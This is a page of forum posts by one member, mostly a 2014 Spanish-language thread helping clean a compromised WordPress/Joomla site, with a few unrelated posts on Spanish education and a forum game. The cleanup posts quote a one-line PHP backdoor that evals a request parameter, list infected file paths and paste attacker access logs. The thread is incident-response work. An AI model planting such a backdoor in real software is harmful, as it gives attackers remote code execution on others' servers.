últimos mensajes de: #!drvy

Mostrar Mensajes
Páginas: 1 ... 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 [389] 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 ... 769

3881	Programación / Desarrollo Web / Re: Mi Wordpress Hackeado	en: 25 Julio 2014, 19:31 pm
Citar (si es un customlog). Yo creo que es un link, porque cuando estuve en el FTP, le cambie el nombre para ver si generaba mas errores y no tener que descargar los 30MB.. y seguía rellenando el mismo archivo aunque tuviese nombre distinto xD Saludos

3882	Foros Generales / Foro Libre / Re: La educación en España es una estafa	en: 25 Julio 2014, 18:00 pm
Bueno, el trabajo es trabajo, tienes razón... Pero si has perdido tantos años estudiando algo que probablemente no vayas a trabajar en tu vida.. ¿ es un poco inútil estudiar no ? Para eso, termino la obligatoria y me busco la vida.. y no hace falta ni universidad ni FP ni nada.. Yo creo que por mucho que les gustaría trabajar aquí a esos ingenieros, si España no les da trabajo en lo que les ha enseñado, están casi obligados a irse. De este modo, Alemania y otros países se lo pasan bomba, porque todos invertimos dinero en que esta gente aprenda, y resulta que ellos se van a otro país que ya no tiene que invertir en ellos... solo cobrarles impuestos ... Saludos

3883	Foros Generales / Foro Libre / Re: La educación en España es una estafa	en: 25 Julio 2014, 17:45 pm
Citar Se da opciones, no se obliga a la juventud a irse. En el mismo curso que comente antes, tenia una compañera con master en ese area que se mato trabajando como camarera/cantante de coro y otros para pagarse los estudios.. ahora trabaja en una fabrica de galletas, en la linea quitando las que están mal hechas... El 89% de los españoles que emigran en busca de empleo cuenta con educación superior Un estudio del Real Instituto Elcano realizado entre 7.000 personas revela que la mayoría de los emigrantes son hombres y que la profesión que más abunda son los ingenieros. http://economia.elpais.com/economia/2013/11/07/empleo/1383838356_819951.html Unos 5000 españoles trabajan sin papeles en el puerto de Tánger en Marruecos Así, las autoridades españolas calculan que hay a 5000 españoles sin permiso de trabajo en la región, muchos de ellos en puestos cualificados. Mientras que algunos consiguen un puesto regular otros se ven forzados a trabajar en negro. http://trabajo.excite.es/unos-5000-espanoles-trabajan-sin-papeles-en-el-puerto-de-tanger-en-marruecos-N41781.html ¿ Opciones de que ? ¿ De ser ingeniero y trabajar como peón ? Saludos

3884	Foros Generales / Foro Libre / Re: Juego: Estas baneado por....	en: 25 Julio 2014, 15:13 pm
Baneo a @Bryantcore y a @synthesize por no seguir las normas del juego ¬¬ Saludos

3885	Programación / Desarrollo Web / Re: Mi Wordpress Hackeado	en: 25 Julio 2014, 05:32 am
En un principio si aunque hay que analizar el joomla por si tiene mas .. "secretos". Dile a tu amiga que te lo pague bien xD Saludos

3886	Programación / Desarrollo Web / Re: Mi Wordpress Hackeado	en: 25 Julio 2014, 05:06 am
Citar Debo comentarlas como has hecho tu o lo estás modificando vos? He borrado las lineas directamente.. eso no puede ser de joomla.. tiene que haber sido modificado por algun h4x0r xD Citar Igualmente me gustaría saber como hacen para encontrar los ARCHIVOS CON LAS LÍNEAS ESAS QUE CONTIENEN "ERRORES" y que son las que debemos modificar... Todo esta en el access-log.txt que tienes al principio cuando entras al FTP.. el problema es que ese log solo muestra lo que se ha visitado.. si el tipo ese ha metido mas en otro lado... jodido. PD: @MinusFour, si quieres te paso el access-log ? Saludos

3887

Programación / Desarrollo Web / Re: Mi Wordpress Hackeado

en: 25 Julio 2014, 05:00 am

@MinusFour tienes razon, y estoy comenzado a sospechar que esos archivos fueron intencionadamente modificados... todos contienen la misma linea..

Código:

/peritajedearte/administrator/templates/hathor/html/com_admin/profile/edit.php?req=
/peritajedearte/tmp/install_530f47f438c16/packages/install_530f47f49d5c7/helpers/captcha/captcha.php?req=
peritajedearte/administrator/components/com_users/views/groups/view.html.php?req=
/peritajedearte/administrator/components/com_templates/helpers/template.php?req=

Saludos

3888	Programación / Desarrollo Web / Re: Mi Wordpress Hackeado	en: 25 Julio 2014, 04:50 am
Si se me olvido mencionarlo.. El archivo esta en peritajedearte/plugins/editors/jckeditor/jckeditor/includes/ckeditor/autoload/startconfig.php La linea uno contenía lo que puse en el post de arriba, y ahora tiene Código <?php #$post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?> PD: En teoria esta todo solucionado, aunque con tantas vulnerabilidades eso era un nido de malware xD Saludos

3889	Programación / Desarrollo Web / Re: Mi Wordpress Hackeado	en: 25 Julio 2014, 04:44 am
En el archivo litermalmente pone esto: Código: <?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?> PD: He comentado la linea.. no debería dar mas problemas. PD2: Como sugerencia, dile a tu amiga que siempre actualice y que use una contraseña mas segura.. Saludos

3890

Programación / Desarrollo Web / Re: Mi Wordpress Hackeado

en: 25 Julio 2014, 04:40 am

Efectivamente, como ha mencionado @MinusFour, ese archivo ejecuta directamente el php, es vulnerable.

Lo que si he podido aislar es el ataque..

Código:

176.31.251.103 - - [06/Jul/2014:21:23:24 -0300] "GET /wp-login.php HTTP/1.1" 200 2827 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:25 -0300] "POST /wp-login.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:26 -0300] "GET /wp-admin/ HTTP/1.1" 200 69338 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:29 -0300] "GET /wp-admin/ HTTP/1.1" 200 69338 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:31 -0300] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 33381 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:32 -0300] "GET /wp-admin/theme-editor.php?file=404.php&theme=wilborada HTTP/1.1" 200 18746 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:33 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:34 -0300] "GET /theme-editor.php?file=404.php&theme=wilborada&scrollto=0&updated=true HTTP/1.1" 404 151 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:35 -0300] "POST /wp-content/themes/wilborada/404.php HTTP/1.1" 200 47 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:36 -0300] "GET /wp-content/themes/wilborada/systemcash.php HTTP/1.1" 200 120 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:38 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:39 -0300] "GET /theme-editor.php?file=404.php&theme=wilborada&scrollto=0&updated=true HTTP/1.1" 404 3 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"

El atacante obtuvo aceso logueandose, modifico el 404.php del tema, lo abrio y lo volvio a modificar. Tambien se ve el primer acceso a systemcash.php.. despues, hay entradas de bots con UA (Mozilla 3.0) que acceden a el muchisimas veces.

Todos los archivos sospechosos están borrados sin embargo (y no he sido yo) xD

Estoy mirando el archivo ese de joomla.

Saludos

Páginas: 1 ... 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 [389] 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 ... 769